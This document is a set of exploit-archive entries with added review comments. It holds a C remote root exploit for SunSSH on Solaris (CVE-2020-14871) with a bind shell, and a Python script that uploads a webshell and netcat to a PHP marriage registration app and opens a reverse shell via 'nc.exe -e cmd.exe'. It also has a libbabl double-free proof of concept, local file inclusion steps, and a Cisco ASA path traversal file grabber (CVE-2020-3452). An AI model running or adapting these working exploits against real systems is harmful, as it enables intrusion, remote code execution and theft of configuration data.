 * Never returns; calls exit(-1) when read() on the socket reports EOF/error.
 * The `sd` parameter shadows the global of the same name. */
void spawn_shell(int sd) {
#define sockbuflen 2048
	int rcv;
	char sockbuf[sockbuflen];
	fd_set readfds;
	memset(sockbuf,0,sockbuflen);
	snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
	write(sd,sockbuf,strlen(sockbuf));
	while (1) {
		FD_ZERO(&readfds);
		FD_SET(0,&readfds);
		FD_SET(sd,&readfds);
		/* NOTE(review): nfds is hard-coded to 255 instead of sd+1; a
		 * descriptor >= 255 would never be polled. */
		select(255,&readfds,NULL,NULL,NULL);
		if (FD_ISSET(sd, &readfds)) {
			/* The buffer is zeroed so the %s below finds a terminator,
			 * but a read() that fills all sockbuflen bytes leaves none. */
			memset(sockbuf,0,sockbuflen);
			rcv = read(sd,sockbuf,sockbuflen);
			if (rcv <= 0) {
              			printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
              			exit(-1);
            		}
			printf("%s",sockbuf);
			fflush(stdout);
		}
      		if(FD_ISSET(0,&readfds)) {
			/* stdin read() result is not checked; strlen() on the zeroed
			 * buffer sizes the write instead (same full-buffer caveat). */
			memset(sockbuf,0,sockbuflen);
			read(0,sockbuf,sockbuflen);
			write(sd,sockbuf,strlen(sockbuf));
        	}
    	}
}

/* Open a second TCP connection to the address main() stored in `sain`, on
 * `port`, and hand it to spawn_shell(). Only sin_port is replaced; sin_family
 * and sin_addr are reused from main(). The previous socket is kept in oldsd so
 * on_interrupt() can close both. Exits the process if connect() fails and
 * otherwise never returns (spawn_shell() loops forever).
 * NOTE(review): the socket() return value is not checked before connect(). */
void bindshell_setup(short port){
	oldsd = sd;
        sd = socket(AF_INET,SOCK_STREAM,0);
        sain.sin_port = htons(port);
        if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
		printf("[!] fatal bind shell failed\n\e[0m");
                exit(-1);
        }
	printf("[-] connected.. enjoy :)\e[0m\n");
        spawn_shell(sd);
}

/* SIGALRM handler, installed and armed (5 s) by kbd_callback(). Reaching it
 * means the authentication call has not returned in time, which the exploit
 * treats as success. Dispatches on the shellcode index chosen with -x: 0 and 2
 * listen on 9999, 1 and 3 on 8080 (the port numbers in shellcodes[].name).
 * `signum` is unused. NOTE(review): printf()/exit()/connect() are called from
 * signal context, which is not async-signal-safe; acceptable for a one-shot
 * tool, but worth knowing when it misbehaves. */
void on_alarm(int signum){
	printf("[+] exploit success, handling payload...\n");
	if(ishell==0||ishell==2){
		bindshell_setup(9999);
	}
	if(ishell==1||ishell==3){
		bindshell_setup(8080);
	}
	printf("[-] exploit complete\n\e[0m");
	exit(0);
}

/* SIGINT handler installed by main() just before authentication starts.
 * Closes the current and the saved socket and exits 0. `signum` is unused.
 * NOTE(review): sd and oldsd are initialised to -1, so the `if(sd)` tests are
 * true even when no socket was ever opened; close(-1) then just fails with
 * EBADF, which is harmless but not what the tests intend. */
void on_interrupt(int signum){
	printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
	if(sd){
		close(sd);
	}
	if(oldsd){
		close(oldsd);
	}
	exit(0);
}

/* Build the global `buf` that kbd_callback() sends as the keyboard-interactive
 * response. Layout: the selected shellcode at offset 0, random ASCII letters up
 * to offset 512, then the selected rop chain at offset 512. Reads the globals
 * payload and retaddr, writes buf. Exits the process on malloc() failure or if
 * the shellcode is >= 512 bytes / the chain does not fit in payload_size.
 * The letters are a filler chosen to avoid the bad characters listed in the
 * comment on the signature line. */
void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
#define payload_size 4096
	int len = strlen(payload);
	buf = malloc(payload_size);
	char randchar = 'A';
	/* two-byte scratch string: one letter plus the NUL that strcat() needs */
	char* randbuf = malloc(2);
	if(!buf||!randbuf){
		printf("[!] fatal payload buffer error\n");
		exit(-1);
	}
	/* NOTE(review): srand() seeds rand(); whether it also seeds random(),
	 * which is what the loop below calls, is implementation-dependent. */
	srand(time(NULL));
	memset(buf,'\x00',payload_size);
	memset(randbuf,0,2);
	printf("[-] shellcode length %d bytes\n",len);
	/* payload_size > 1024 is a compile-time constant and always true here. */
	if(len < 512 && payload_size > 1024){
		memcpy(buf,payload,len);
		/* Runs 513-len times, i.e. one letter past offset 511; the chain copied
		 * at buf+512 below overwrites that extra byte, so the result is still
		 * exactly 512 bytes of shellcode+filler followed by the chain. */
		for(int i =0;i <= (512 - len);i++){
 			randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
			memcpy(randbuf,&randchar,1);
			strcat(buf,randbuf);
		}
		len = strlen(retaddr);
		printf("[-] rop chain length %d\n",len);
		if(len + 512 < payload_size){
			memcpy((void*)(long)buf+512,(void*)retaddr,len);
			len = strlen(buf);
			printf("[-] exploit buffer length %d\n",len);
		}
		else{
			printf("[!] exploit buffer miscalculated\n");
			exit(-1);
		}
	}
	else{
		printf("[!] exploit buffer miscalculated\n");
		exit(-1);
	}
}

/* libssh2 keyboard-interactive callback (signature dictated by
 * libssh2_userauth_keyboard_interactive()). Answers only the first prompt
 * (i = 0) with the buffer built by prepare_payload(), then arms a 5 s alarm;
 * if the auth call has not returned by then on_alarm() runs. The response is
 * strdup()'d because libssh2 frees the response text itself.
 * From the server's point of view the distinguishing feature of this attack is
 * a keyboard-interactive answer to the user-name prompt that is hundreds of
 * bytes long (580 in the usage example) rather than a name.
 * NOTE(review): num_prompts is printed but not checked; prompts[0] is accessed
 * even when the server sent none. name/instruction/abstract are unused. */
static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
	int i = 0;
	signal(SIGALRM, &on_alarm);
	printf("[+] entering keyboard-interactive authentication.\n");
	printf("[-] number of prompts: %d\n", num_prompts);
	printf("[-] prompt %d from server: '", i);
	fwrite(prompts[i].text, 1, prompts[i].length, stdout);
	printf("'\n");
	prepare_payload();
	//uncomment to pause for gdb debugging
	//sleep(10);
	responses[i].text = strdup(buf);
	responses[i].length = strlen(buf);
	printf("[-] sending exploit magic buffer... wait\n");
	alarm(5);
}

/* Entry point. Parses -s/--server, -p/--port (default 22), -t/--target and
 * -x/--shellcode, connects with libssh2 and starts keyboard-interactive
 * authentication; kbd_callback() above supplies the response and on_alarm()
 * takes over on success. Returns -2 from the shutdown path (connect or
 * handshake failure, or the auth call returning), exit(0) after --help,
 * exit(-1) when a required option is missing.
 * NOTE(review): type, exitcode, channel, exitsignal and len are declared but
 * never used, and `session` is never freed. */
int main(int argc,char **argv){
	int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
	char* host;
	int i, type, exitcode;
	unsigned long hostaddr;
	const char *fingerprint;
	LIBSSH2_SESSION *session;
	LIBSSH2_CHANNEL *channel;
	char *exitsignal = (char *)"none";
	size_t len;
	LIBSSH2_KNOWNHOSTS *nh;
	static struct option options[] = {
		{"server", 1, 0, 's'},
		{"port", 1, 0, 'p'},
		{"target", 1, 0, 't'},
		{"shellcode", 1, 0, 'x'},
		{"help", 0, 0,'h'}
        };
	printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
	/* rc doubles as the getopt_long() result and, inside the 'x'/'t' cases, as
	 * the parsed index; getopt_long() reassigns it on the next pass, so the
	 * loop still ends on -1. */
	while(rc != -1) {
	        rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
        	switch(rc) {
               		case -1:
	                        break;
        	        case 's':
				/* first -s wins; host is sized to the argument, so sprintf() fits */
				if(ihost==0){
					host = malloc(strlen(optarg) + 1);
					if(host){
						sprintf(host,"%s",optarg);
						ihost = 1;
					}
				}
               			break;
	                case 'p':
				port = atoi(optarg);
                	        break;
			case 'x':
				/* The four cases differ only in the index: copy the chosen
				 * shellcode to the heap and remember the index in ishell.
				 * NOTE(review): strlen() is size_t but printed with %d. */
				if(ishell==-1) {
					rc = atoi(optarg);
					switch(rc){
						case 0:
							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
							if(payload){
								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
								ishell = rc;
							}
							break;
						case 1:
							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
							if(payload){
								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
								ishell = rc;
							}
							break;
						case 2:
							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
							if(payload){
								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
								ishell = rc;
							}
							break;
						case 3:
							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
							if(payload){
								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
								ishell = rc;
							}
							break;

						default:
							printf("[!] Invalid shellcode selection %d\n",rc);
							exit(0);
							break;
						}
				}
				break;
	                case 't':
				/* Same shape as 'x' for the rop chain. itarg is set to rc inside
				 * the switch and then forced to 1 after it, so the final
				 * argument check also passes for target 0. */
				if(itarg==0){
					rc = atoi(optarg);
					switch(rc){
						case 0:
							printf("[-] chosen target '%s'\n",targets[rc].name);
							retaddr = malloc(strlen(targets[rc].ropchain)+1);
							if(retaddr){
								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
								itarg = rc;
							}
							break;
						case 1:
							printf("[-] chosen target '%s'\n",targets[rc].name);
							retaddr = malloc(strlen(targets[rc].ropchain)+1);
							if(retaddr){
								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
								itarg = rc;
							}
							break;
						case 2:
							printf("[-] chosen target '%s'\n",targets[rc].name);
							retaddr = malloc(strlen(targets[rc].ropchain)+1);
							if(retaddr){
								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
								itarg = rc;
							}
							break;
						case 3:
							printf("[-] chosen target '%s'\n",targets[rc].name);
							retaddr = malloc(strlen(targets[rc].ropchain)+1);
							if(retaddr){
								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
								itarg = rc;
							}
							break;
						case 4:
							printf("[-] chosen target '%s'\n",targets[rc].name);
							retaddr = malloc(strlen(targets[rc].ropchain)+1);
							if(retaddr){
								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
								itarg = rc;
							}
							break;
						default:
							printf("[!] Invalid target selection %d\n", rc);
							exit(0);
							break;
					}
					itarg = 1;
				}
        	                break;
			case 'h':
				printf("[!] Usage instructions.\n[\n");
				printf("[ %s <required> (optional)\n[\n[   --server|-s <ip/hostname>\n",argv[0]);
				printf("[   --port|-p (port)[default 22]\n[   --target|-t <target#>\n");
				printf("[   --shellcode|-x <shellcode#>\n[\n");
				printf("[ Target#'s\n");
				for(i = 0;i <= targetno - 1;i++){
					/* NOTE(review): passes the whole struct target where %s expects a
					 * char*; this should be targets[i].name. */
					printf("[ %d \"%s\"\n",i,targets[i]);
				}
				printf("[\n[ Shellcode#'s\n");
				for(i = 0;i <= shellno - 1;i++){
					printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
				}
				printf("\e[0m");
				exit(0);
				break;
			default:
                		break;
	        }
	}
	if(itarg != 1 || ihost  != 1 || ishell < 0){
		printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
		exit(-1);
	}
	/* NOTE(review): libssh2_init()'s result is stored but not checked, and
	 * inet_addr() accepts only dotted-quad addresses (a hostname yields
	 * INADDR_NONE, which is not tested) despite --help advertising hostnames. */
	rc = libssh2_init(0);
	hostaddr = inet_addr(host);
	sd = socket(AF_INET, SOCK_STREAM, 0);
	sain.sin_family = AF_INET;
	sain.sin_port = htons(port);
	sain.sin_addr.s_addr = hostaddr;
	if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
		fprintf(stderr, "[!] failed to connect!\n");
		goto shutdown;
	}
	/* Blocking session; the handshake is simply retried while libssh2 reports EAGAIN. */
	session = libssh2_session_init();
	libssh2_session_set_blocking(session, 1);
	while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
	if(rc) {
		printf("[!] failure establishing ssh session: %d\n", rc);
		goto shutdown;
	}
	nh = libssh2_knownhost_init(session);
	if(!nh) {
		printf("[!] failure on libssh2 init\n");
		goto shutdown;
	}
	/* The SHA1 host-key hash is printed for the operator but never compared with
	 * a known value, so the server is not authenticated by this client.
	 * NOTE(review): libssh2_hostkey_hash() can return NULL; it is indexed
	 * unconditionally below. */
	fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
	printf("[+] ssh host fingerprint: ");
	for(i = 0; i < 20; i++) {
		printf("%02x", (unsigned char)fingerprint[i]);
	}
	printf("\n");
	libssh2_knownhost_free(nh);
	signal(SIGINT,&on_interrupt);
	/* Empty username; kbd_callback() answers the prompt. If this call returns
	 * the attempt did not succeed, and as the message says the server-side
	 * sshd child may have crashed - a core file there is the trace a failed
	 * attempt leaves. */
	libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
	printf("[!] exploit failed, core maybe on target!\n");
shutdown:
	if(sd){
		close(sd);
	}
	printf("\e[0m");
	return -2;
}
            
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server

#!/usr/bin/python3

import requests
import sys
import os
import iterm2
import AppKit

# Positional arguments are read at import time, before the argument-count
# check in the __main__ block below runs, so starting the script with fewer
# than three arguments fails here with an IndexError instead of printing the
# usage line.
url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3] 

# CONFIGURE HERE
# Address and port the listener started by start_listener() waits on; the
# 'xx' octets are a placeholder as shipped.
reverse_ip = '192.168.xx.xx'
reverse_port = 4444

# CONFIGURE HERE
# SCRIPT WILL UPLOAD NETCAT AND A WEBSHELL
# (local paths of the two files handed to upload(); placeholders as shipped)
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'


def login(url: str, mobile: str, password: str) -> str:
    """POST the credentials to ``/user/login.php`` and return the session id.

    Args:
        url: base URL of the application (no trailing slash).
        mobile: value sent as the ``mobno`` form field.
        password: value sent as the ``password`` form field.

    Returns:
        The ``PHPSESSID`` cookie value from the response.

    Raises:
        KeyError: presumably, when the response carries no ``PHPSESSID``
        cookie (e.g. a failed login) -- the status code is not checked.
    """

    url = "{}/user/login.php".format(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    cookie = req.cookies['PHPSESSID']
    
    return cookie


def upload(url, cookie, file=None):
    """Submit the marriage registration form with ``file`` as the husband image.

    The content type is chosen from the local extension ('.exe' ->
    application/octet-stream, anything else -> application/x-php); every
    other form field is filled with dummy values. The response is not
    inspected before the success line is printed.

    Args:
        url: base URL of the application.
        cookie: ``PHPSESSID`` value returned by login().
        file: local path of the file to upload; ``None`` makes open() raise.

    The weakness exercised here is that the form's image field accepts a
    file of any type and extension; the corresponding server-side fix is to
    validate the extension and content on the server and to store uploads
    where they cannot be executed.
    """

    # NOTE(review): the handle is never closed; a ``with`` block would do it.
    f = open(file, 'rb')
    filename, ext = os.path.splitext(file)

    if "exe" in ext:
        content_type = 'application/octet-stream'
    else:
        content_type = 'application/x-php'

    cookie = {'PHPSESSID':cookie}
    url = "{}/user/marriage-reg-form.php".format(url)

    # 'wifeimage' is sent as an empty placeholder so the form validates.
    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
    req = requests.post(url, data=payload, cookies=cookie, files=files)
    print(f'[+] File {ext} uploaded')


def get_remote_file(url: str, ext: str) -> str:
    """Recover the server-side name of an uploaded file from ``/user/images``.

    Fetches the image directory, takes the text before the first occurrence
    of ``ext`` and returns its last 42 characters plus ``ext``. This relies
    on two things: the directory listing being exposed by the web server,
    and the stored name being exactly 42 characters long before the
    extension (presumably the application's renaming scheme -- verify).

    Args:
        url: base URL of the application.
        ext: extension to look for, including the dot (e.g. '.php').

    Returns:
        The guessed file name. Disabling directory listings on the images
        path removes the information this function depends on.
    """

    url = "{}/user/images".format(url)
    req = requests.get(url)
    junk = req.text.split(ext)[0]
    f = junk[-42:] + ext
    
    return f


def persistence(url: str, webshell: str, netcat: str) -> None:
    """Copy the two uploaded files to fixed names via the uploaded script.

    Issues two GET requests to the uploaded ``webshell`` with a ``cmd``
    parameter (Windows ``copy`` syntax, matching the 'Tested on' line in the
    header) so the later steps can refer to ``shell.php`` and ``nc.exe``
    directly. Neither response is checked; ``req_w``/``req_n`` are unused.

    Args:
        url: base URL of the application.
        webshell: server-side name of the uploaded PHP file.
        netcat: server-side name of the uploaded executable.
    """

    # webshell
    payload_w = "copy /y {} shell.php".format(webshell)
    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
    req_w = requests.get(url_w)
    
    # netcat
    payload_n = "copy /y {} nc.exe".format(netcat)
    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
    req_n= requests.get(url_n)

    print('[+] Persistence enabled')


def get_reverse(url: str, ip: str, port: int) -> None:
    """Ask ``shell.php`` to run the uploaded nc.exe towards ``ip``:``port``.

    Single GET request; the response is ignored (the call is expected to
    block while the connection is open).

    Args:
        url: base URL of the application.
        ip: address the listener is waiting on.
        port: port the listener is waiting on.
    """

    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
    print('[+] Reverse shell incoming!')
    req = requests.get(url_r)


# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port: int) -> None:
    """Open a new iTerm2 tab running ``nc -lnv <port>``.

    macOS only: uses AppKit to launch iTerm2 and the ``iterm2`` Python API
    to create the tab in the current window. Prints a message and does
    nothing if iTerm2 reports no current window.

    Args:
        port: local port the listener binds to.
    """
    
    # Launch the app
    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")

    async def main(connection):
        # Runs inside the iterm2 event loop; ``connection`` is supplied by
        # iterm2.run_until_complete().
        app = await iterm2.async_get_app(connection)
        window = app.current_window
        if window is not None:
            cmd = "nc -lnv {}".format(port)
            await window.async_create_tab(command=cmd)
        else:
            print("No current window")

    iterm2.run_until_complete(main)



if __name__ == "__main__":

    # NOTE(review): ``sys.argv < 3`` compares a list with an int, which raises
    # TypeError in Python 3 before len() is evaluated; in practice the
    # module-level sys.argv[1..3] reads above already fail on a short argument
    # list, so this branch never prints the usage line.
    if len(sys.argv < 3): 
        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
    else:
        # End-to-end flow: authenticate, upload both files through the
        # registration form, recover their stored names from the image
        # directory listing, copy them to fixed names, then start the local
        # listener and trigger the callback.
        cookie = login(url, mobile, password)
        upload(url, cookie, netcat_path)
        upload(url, cookie, shell_path)
        webshell = get_remote_file(url, '.php')
        netcat = get_remote_file(url, '.exe')
        persistence(url, webshell, netcat)
        
        start_listener(reverse_port)
        get_reverse(url, reverse_ip, reverse_port)
            
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Date: December 14, 2020
# Exploit Author: Carter Yagemann
# Vendor Homepage: https://www.gegl.org
# Software Link: https://www.gegl.org/babl/
# Version: libbabl 0.1.62 and newer
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c

/*
 * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
 * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
 *
 * typedef struct
 * {
 *   char  *signature;
 *   size_t size;
 *   int  (*destructor)(void *ptr);
 * } BablAllocInfo;
 *
 *
 * signature is used to track whether a chunk was allocated by babl, and if so, whether
 * it is currently allocated or freed. This is done by either pointing it to the global
 * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
 *
 * Using this signature, babl can detect bad behaviors such as a double free (babl-memory.c:173):
 *
 * void
 * babl_free (void *ptr,
 *            ...)
 * {
 *   ...
 *       if (freed == BAI (ptr)->signature)
 *         fprintf (stderr, "\nbabl:double free detected\n");
 *
 *
 * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
 * and free(), which has its own data that it stores within freed chunks, most systems will
 * overwrite babl's signature variable upon freeing, breaking the double free detection.
 * The simple PoC below demonstrates this:
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#include <babl/babl-memory.h>

/* Minimal reproducer: allocate through babl so the chunk carries babl's
 * BablAllocInfo header (signature/size/destructor, see the comment above),
 * then free the same pointer twice. argc/argv are unused. */
int main(int argc, char **argv) {
    void *buf = babl_malloc(42);
    babl_free(buf);
    // BUG: reports an "unknown" pointer warning when the following is clearly a double free
    // (after the first free the libc allocator reuses the chunk's memory, so babl's
    //  signature word no longer holds the "freed" marker its check looks for).
    babl_free(buf);

    return 0;
}
            
# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=index
Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00

Note: php version < 5.3.3

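<section class="content">
    <div class="container-fluid">
    <?php
    	// Resolve the `page` query parameter to one of the application's own
    	// page scripts. Passing the raw parameter to include(), as the
    	// vulnerable version did, lets a request select arbitrary files
    	// (see the steps above), so the value is reduced to a bare name and
    	// then checked against an allow-list of known pages. Extend the list
    	// with the application's real page names ('home' is the default the
    	// original code used).
    	$allowed_pages = ['home', 'index'];
    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
    	// basename() discards any directory component, so traversal sequences
    	// can never survive; the strict in_array() check then rejects anything
    	// that is not a listed page.
    	$page = basename($page);
    	if(!in_array($page, $allowed_pages, true) || !file_exists($page.".php")){
    	    include '404.html';
    	}else{
    	    include $page.'.php';
    	}
    ?>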
            
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: Freakyclown@cygenta.co.uk
# Vendor Homepage: cisco.com
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}
# Example: CVE-2020-3452.py 192.168.0.12
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above CVE and attempts to
# download the files listed below. It is suggested that you make
# a working folder for the output files to avoid confusion if
# attacking multiple ASAs.

# set your target
# Prompted for at import time, so importing this module also prompts. The
# value is spliced into the request URL in grabstuff() without validation.
target = input("Enter target IP/Url: ")


def grabstuff() -> None:
    """Request every name in the module-level ``files`` set through the
    translation-table endpoint and write each response body to a local file
    of the same name.

    Relies on ``files`` and ``target`` existing at module scope (``files`` is
    assigned further down the file, which works because the lookup happens
    only when this function is called). Returns nothing; any requests or
    file error propagates to the caller.
    """
    for file in files:
        print("trying: ", file)

        #set request parameters
        # The ``lang`` value of ``../`` combined with the ``textdomain`` path is
        # the traversal pattern of CVE-2020-3452; a request to
        # /+CSCOT+/translation-table carrying these parameters is what to alert
        # on when writing detections for this issue.
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/'+file),
            ('default-language', ''),
            ('lang', '../'),
        )

        # send the request to the target with the parameters above
        # NOTE(review): verify=False disables TLS certificate validation, so the
        # session can be intercepted by anyone on the path.
        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
        # write the file to the disk
        # NOTE(review): the status code is never checked, so a failed request
        # still produces an output file holding the error page; a ``with``
        # block would also guarantee the close on exceptions.
        f = open(file,"w")
        f.write(response.text) 
        f.close()



# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
# Set literal (not a list, so iteration order is arbitrary between runs) of
# file names requested by grabstuff(); each is appended to '+CSCOE+/' in the
# textdomain parameter and also used as the local output file name.
files = {
"sess_update.html",
"blank.html",
"noportal.html",
"portal_ce.html",
"portal.html",
"logon_custom.css",
"svc.html",
"logo.gif",
"portal_inc.lua",
"nostcaccess.html",
"session.js",
"portal.js",
"portal_custom.css",
"running.conf",
"tlbrportal_forms.js",
"logon_forms.js",
"win.js",
"portal.css",
"lced.html",
"pluginlib.js",
"useralert.html",
"ping.html",
"app_index.html",
"shshimdo_url",
"session_password.html",
"relayjar.html",
"relayocx.html",
"color_picker.js",
"color_picker.html",
"cedhelp.html",
"cedmain.html",
"cedlogon.html",
"cedportal.html",
"portal_elements.html",
"commonspawn.js",
"common.js",
"appstart.js",
"relaymonjar.html",
"relaymonocx.html",
"cedsave.html",
"tunnel_linux.jnlp",
"ask.html",
"no_svc.html",
"preview.html",
"cedf.html",
"ced.html",
"logon_redirect.html",
"logout.html",
"tunnel_mac.jnlp",
"gp-gip.html",
"auth.html",
"wrong_url.html",
"logon.html"}


# obvious thing is obvious, try the things and barf if fail
# Catches every exception (network, TLS, file-write errors alike) and prints
# it; the process still exits 0, so a caller cannot tell failure from success
# by exit status.
try:
    grabstuff()
except Exception as err:
    print("Something went wrong sorry")
    print(err)